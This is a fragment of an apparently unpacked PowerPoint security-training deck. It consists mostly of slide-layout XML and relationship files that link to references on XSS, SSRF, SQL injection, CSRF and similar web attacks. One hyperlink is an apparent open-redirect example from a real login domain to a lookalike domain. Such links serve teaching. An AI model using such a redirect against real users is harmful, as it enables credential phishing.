            <a:ext cx="2301600" cy="2301600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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2" name="Google Shape;622;p95"/>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623" name="Google Shape;623;p95"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800"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624" name="Google Shape;624;p95"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163775"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625" name="Google Shape;625;p95"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5922750"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626" name="Google Shape;626;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141375" y="4497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627" name="Google Shape;627;p95"/>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F12 - Body (green left, bullets right)">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 628"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4565400" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rec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6"/>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96"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p96"/>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63F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="633" name="Google Shape;633;p9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34" name="Google Shape;634;p9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635" name="Google Shape;635;p96"/>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F13 - Body (navy left, bullets right)">
  <p:cSld name="CUSTOM_9_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 636"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4565400" cy="51435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7"/>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97"/>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rgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Google Shape;640;p97"/>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6BBF4E"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="641" name="Google Shape;641;p97"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42" name="Google Shape;642;p9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643" name="Google Shape;643;p97"/>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Z2 - DO NOT USE - for template">
  <p:cSld name="CAPTION_ONLY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 644"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p98"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290500" y="9631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pic>
        <p:nvPicPr>
          <p:cNvPr id="646" name="Google Shape;646;p98"/>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647" name="Google Shape;647;p9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648" name="Google Shape;648;p98"/>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E1 - Numbers (1 large)">
  <p:cSld name="BIG_NUMBER_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 649"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="650" name="Google Shape;650;p99"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51" name="Google Shape;651;p99"/>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2" name="Google Shape;652;p99"/>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53" name="Google Shape;653;p9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54" name="Google Shape;654;p99"/>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E2 - Numbers (1 large, pattern)">
  <p:cSld name="BIG_NUMBER_1_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 655"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p100"/>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7" name="Google Shape;657;p100"/>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658" name="Google Shape;658;p100"/>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659" name="Google Shape;659;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-194725" y="835700"/>
            <a:ext cx="2036400" cy="20364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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738325" y="1111550"/>
            <a:ext cx="722100" cy="72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1" name="Google Shape;661;p100"/>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662" name="Google Shape;662;p100"/>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663" name="Google Shape;663;p100"/>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E3 - Numbers (1 large, title)">
  <p:cSld name="BIG_NUMBER_1_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 664"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Google Shape;665;p101"/>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6" name="Google Shape;666;p101"/>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67" name="Google Shape;667;p101"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216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8" name="Google Shape;668;p10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69" name="Google Shape;669;p10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70" name="Google Shape;670;p101"/>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63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout70.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8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theme" Target="../theme/theme2.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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2"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3pPr>
            <a:lvl4pPr marL="1828800" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7"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8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F44"/>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Google Shape;456;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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>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7" name="Google Shape;457;p67"/>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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2"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3pPr>
            <a:lvl4pPr marL="1828800" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7"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8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F44"/>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 id="2147483771" r:id="rId59"/>
    <p:sldLayoutId id="2147483772" r:id="rId60"/>
    <p:sldLayoutId id="2147483773" r:id="rId61"/>
    <p:sldLayoutId id="2147483774" r:id="rId62"/>
    <p:sldLayoutId id="2147483775" r:id="rId63"/>
    <p:sldLayoutId id="2147483776" r:id="rId6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0.xml"/><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1.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7.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/></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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><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30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://duo.com/login?redirect=du0.com/login"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8.xml"/></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9.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0.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2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.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8.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7.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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide151.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://excess-xss.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.utexas.edu/~shmat/courses/cs380s_fall09/06tocttou-porter.pptx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.safaribooksonline.com/library/view/the-web-application/9781118026472/chap15-sec013.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.peachpit.com/blogs/blog.aspx?uk=Securely-Handling-File-Uploads-Five-Critical-E-Commerce-Security-Tips-in-Five-Days" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synopsys.com/content/dam/synopsys/sig-assets/whitepapers/exploiting-the-java-deserialization-vulnerability.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide151.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/penetration-testing/remote-code-execution-bug-hunting-chapter-1/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.kudelskisecurity.com/2013/12/13/timing-attacks-part-1/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/docs/HII_Remote_and_Local_File_Inclusion_Vulnerabilities.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://compsecurityconcepts.wordpress.com/2013/11/02/authentication-bypass/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/csrf-attacks/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs142/papers/web-session-management.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest.blog/how-to-test-horizontal-vertical-authorization-issues-in-web-application/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://javapipe.com/ddos/blog/ddos-typ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hyperlink" Target="http://flaws.cloud/" TargetMode="External"/><Relationship Id="rId3" 